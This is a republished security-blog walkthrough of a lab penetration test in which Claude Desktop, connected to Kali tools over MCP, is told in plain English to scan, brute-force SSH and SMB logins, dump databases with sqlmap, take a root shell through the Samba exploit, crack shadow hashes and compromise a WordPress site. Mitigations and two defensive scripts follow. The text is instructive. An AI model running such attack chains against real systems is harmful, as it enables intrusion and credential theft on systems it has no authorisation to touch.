Automated Penetration Testing with Claude AI: A Natural‑Language‑Driven End‑to‑End Attack Chain
This article demonstrates how Claude Desktop, connected to a Model Context Protocol (MCP) server on Kali Linux, can be instructed with plain English to run real Kali tools, perform reconnaissance, exploit vulnerabilities, crack credentials, compromise a WordPress site, and ultimately obtain domain‑admin rights on a Windows Server 2019, while also presenting mitigation measures for each step.
Phase 1: Build MCP‑Kali integration
Install the MCP server package on the Kali host:
sudo apt install mcp-kali-server
Edit ~/.config/Claude/claude_desktop_config.json to register the server:
{"mcpServers":{"kali-tools":{"command":"mcp-server","args":[]}}}
Install Claude Desktop from its APT repository:
curl -fsSL https://pkg.claude-desktop-debian.dev/KEY.gpg | sudo gpg --dearmor -o /usr/share/keyrings/claude-desktop.gpg
echo "deb [signed-by=/usr/share/keyrings/claude-desktop.gpg arch=amd64,arm64] https://pkg.claude-desktop-debian.dev stable main" | sudo tee /etc/apt/sources.list.d/claude-desktop.list
sudo apt update && sudo apt install claude-desktop
After restarting Claude Desktop, the kali-tools server appears as running. Claude lists the available capabilities (nmap, nikto, gobuster, dirb, hydra, sqlmap, metasploit, john, enum4linux, etc.) and confirms server health.
Phase 2: Reconnaissance and enumeration
Nmap scan
Fast‑mode scan with service version detection on the Metasploitable host (192.168.1.14):
execute_command nmap_scan against 192.168.1.14 in fast mode, performing service version detection and executing default NSE scripts
Results show:
Anonymous FTP running vsftpd 2.3.4 with backdoor
Plain‑text Telnet
SMTP supporting weak SSLv2
Samba 3.0.20 with remote‑code‑execution vulnerability (CVE‑2007‑2447)
Web directory enumeration
Gobuster scan of the DVWA application:
execute_command gobuster_scan http://192.168.1.14/dvwa/
Identifies HTTP 200 resources, 301 redirects and seven active endpoints, including an unauthenticated /setup page, a php.ini leak and the login page.
DIRB scan for confirmation:
execute dirb_scan against http://192.168.1.14/dvwa/ and display only the directories or files that return an HTTP 200 OK response
Filters to the same seven endpoints.
SMB enumeration
Enum4linux scan of the Samba service:
execute_command enum4linux_scan 192.168.1.14
First attempt times out; a retry with adjusted parameters returns host name, vulnerable Samba version, workgroup and an anonymous share (tmp) that reveals 35 user accounts, including root and msfadmin.
SSH credential brute‑force
Hydra attack against the SSH service on the SQLI‑Labs host (192.168.1.15) using local users.txt and password.txt dictionaries:
execute_command hydra_attack to test SSH logins on 192.168.1.15 using the usernames from users.txt and passwords from password.txt
After testing 42 credential pairs (≈34 s) the pair pentest:123 is recovered and a ready‑to‑use SSH command is returned.
Phase 3: Exploitation
SQL injection
Sqlmap scan of the vulnerable endpoint on SQLI‑Labs:
execute_command sqlmap_scan on http://192.168.1.15/Less-1/
Confirms a MySQL backend and four injection techniques (boolean, error, time, UNION). Five databases are enumerated; the security database is marked as primary. Four tables are dumped, extracting 13 clear‑text username/password pairs.
Metasploit port scan
Metasploit auxiliary TCP port scanner against Metasploitable (ports 1‑1024):
execute_command metasploit_scan port scan on 192.168.1.14
Open services reported: FTP, SSH, Telnet, SMTP, DNS, HTTP, RPCbind, NetBIOS, SMB.
Samba RCE (CVE‑2007‑2447)
Use the usermap_script exploit to obtain a root shell:
use Samba usermap_script (CVE-2007-2447) on port 445 lhost=192.168.1.17
The session persists as a cmd/unix shell with uid=0(root).
Phase 4: Post‑exploitation and credential cracking
Shadow file extraction
With root access, read /etc/shadow. All password hashes use the legacy MD5‑crypt format ($1$ prefix), making them relatively easy to crack.
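The same observation can be turned into a hardening check. The following is an added example, not part of the original article: it classifies each entry of shadow-format text by its crypt(5) prefix and reports accounts that still use MD5-crypt, traditional DES crypt, or no password. The names classify, audit and SAMPLE_SHADOW are hypothetical, and the sample entries are constructed with placeholder hash fields.

```python
# Added example: audit shadow-format text for weak or missing password hashes.
# Prefix-to-scheme mapping follows crypt(5); SAMPLE_SHADOW is constructed and
# its "hash" fields are placeholders, not real hashes.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
WEAK = {"md5crypt", "descrypt", "empty"}

def classify(field):
    """Return the hash scheme name for the second field of a shadow entry."""
    if field == "":
        return "empty"                      # account has no password at all
    if field[0] in "!*":
        field = field.lstrip("!")           # "!" + hash = locked, hash still stored
        if not field.startswith("$"):
            return "locked"
    if field.startswith("$"):
        return SCHEMES.get(field.split("$")[1], "unknown")
    return "descrypt" if len(field) == 13 else "unknown"

def audit(shadow_text):
    """List (user, scheme) for every entry whose scheme is in WEAK."""
    findings = []
    for line in shadow_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 2 or line.lstrip().startswith("#"):
            continue
        scheme = classify(parts[1])
        if scheme in WEAK:
            findings.append((parts[0], scheme))
    return findings

SAMPLE_SHADOW = """\
root:$1$PLACEHOLDERSALT$PLACEHOLDERHASH:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
msfadmin:!$1$PLACEHOLDERSALT$PLACEHOLDERHASH:14684:0:99999:7:::
deploy:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19000:0:99999:7:::
oldsvc:abPLACEHOLDER:14684:0:99999:7:::
guest::14684:0:99999:7:::
"""

if __name__ == "__main__":
    for user, scheme in audit(SAMPLE_SHADOW):
        print(f"{user}: {scheme}")
```

A locked entry that still stores a $1$ hash is reported as well, because the hash remains crackable if the file leaks.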
John the Ripper
Crack the hashes using the rockyou.txt dictionary. Claude runs an iterative approach: a trimmed dictionary for speed, then the full list for completeness.
execute_command john_crack on hashes using rockyou.txt file
Six of seven passwords are recovered (86% success); only root remains unrecovered.
Phase 5: Compromise WordPress target
WPScan enumeration
Run WPScan against the WordPress VM (192.168.1.16):
execute_command wp_scan http://192.168.1.16/wordpress/
Identifies WordPress 5.2.24, two valid users (admin, aarti), seven plugins (including vulnerable reflex-gallery and mail-masta), and misconfigurations such as exposed phpinfo.php and readme.html.
Reflex‑Gallery exploit (CVE‑2015‑4133)
Upload a PHP payload via the unauthenticated file‑upload flaw using Metasploit:
exploit reflex-gallery
Establishes a Meterpreter session as www-data.
Mail‑Masta exploit (CVE‑2016‑10956)
Manual LFI to read /etc/passwd, revealing root and raj. Then retrieve wp-config.php via a PHP filter wrapper to obtain database credentials.
exploit mail-masta
Privilege escalation to WordPress admin
Using the extracted database credentials, reset the admin password to admin:hacked123 and log into the WordPress dashboard, gaining full control over posts, plugins, themes and the underlying server.
Phase 6: Operational tooling
Health check
Claude reports the MCP server as healthy and lists tool status:
nmap, nikto, dirb, gobuster – API down but still callable via execute_command
hydra, sqlmap, metasploit, john, enum4linux – operational
Command reference
Requesting help returns a quick‑reference table grouped into scanning (nmap_scan, nikto_scan, dirb_scan, gobuster_scan, enum4linux_scan, wp_scan), exploitation (sqlmap_scan, hydra_attack, metasploit_scan, use, exploit) and post‑exploitation (john_crack, sessions, dump shadow) commands.
Phase 7: Pivot to Windows domain controller
NetExec SMB authentication
Use NetExec (nxc) with the same user/password lists to test SMB authentication on the Windows Server 2019 DC (192.168.1.18):
execute_command nxc to test smb authentication on 192.168.1.18 with the usernames listed in users.txt and the passwords listed in password.txt
Out of 56 credential combinations only administrator:Ignite@987 succeeds, granting full SMB (445) and WinRM (5985) administrator access.
Mitigation strategies
Patch and retire stale software: Upgrade or decommission unsupported services such as Samba 3.0.20 (CVE‑2007‑2447), vsftpd 2.3.4, Apache 2.2.8, PHP 5.2.4 and outdated WordPress core/plugins.
Disable anonymous and default access: Turn off anonymous FTP and SMB empty sessions, remove public management interfaces (phpMyAdmin, phpinfo.php, readme.html), and disable directory indexing, HTTP TRACE and XML‑RPC.
Enforce strong authentication: Require long, unique, complex passwords, lock accounts after failed attempts, rate‑limit logins and enable multi‑factor authentication. Replace MD5‑crypt hashes with bcrypt/Argon2.
Secure web applications: Use parameterized queries, input validation, a Web Application Firewall, restrict file‑upload types and permissions, disable allow_url_include, and run database accounts with least privilege.
Network hardening and continuous monitoring: Segment networks, apply least‑privilege firewall rules, block outbound connections from compromised hosts, enforce SMB signing, deploy centralized logging, IDS/EDR and monitor for scanning or brute‑force activity.
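The brute‑force monitoring named above can be prototyped directly against sshd authentication logs. The following is an added example, not part of the original article: it flags a source address that produces a burst of failed password attempts and, separately, a successful login from that address inside the same window, which is the pattern the SSH dictionary run in Phase 2 leaves behind. The function name detect, the threshold of 5 failures in 60 seconds and the log year are assumptions, and SAMPLE_LOG is constructed in the standard OpenSSH message format.

```python
# Added example: detect SSH password brute force, and a login that follows it,
# from sshd auth log lines. Threshold, window and year are assumed values.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return alerts as (kind, source_ip, user) tuples in log order."""
    recent = defaultdict(deque)          # source ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so one is supplied by the caller
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        failures = recent[m["ip"]]
        while failures and ts - failures[0] > window:
            failures.popleft()           # drop failures that left the window
        if m["result"] == "Failed":
            failures.append(ts)
            if len(failures) == threshold:   # alert once when the burst is reached
                alerts.append(("brute_force", m["ip"], None))
        elif len(failures) >= threshold:
            # a success right after a burst suggests a guessed credential
            alerts.append(("login_after_brute_force", m["ip"], m["user"]))
    return alerts

# Constructed sample: six failures from one address, an unrelated user who
# mistypes once, then a success from the address that produced the burst.
SAMPLE_LOG = [
    f"Jan 10 10:00:{s:02d} sqli-labs sshd[900]: Failed password for "
    f"{'invalid user admin' if s % 2 else 'pentest'} from 192.168.1.17 port {40000 + s} ssh2"
    for s in range(6)
] + [
    "Jan 10 10:00:06 sqli-labs sshd[901]: Failed password for alice from 192.168.1.50 port 50000 ssh2",
    "Jan 10 10:00:07 sqli-labs sshd[901]: Accepted password for alice from 192.168.1.50 port 50001 ssh2",
    "Jan 10 10:00:08 sqli-labs sshd[902]: Accepted password for pentest from 192.168.1.17 port 40100 ssh2",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```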
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
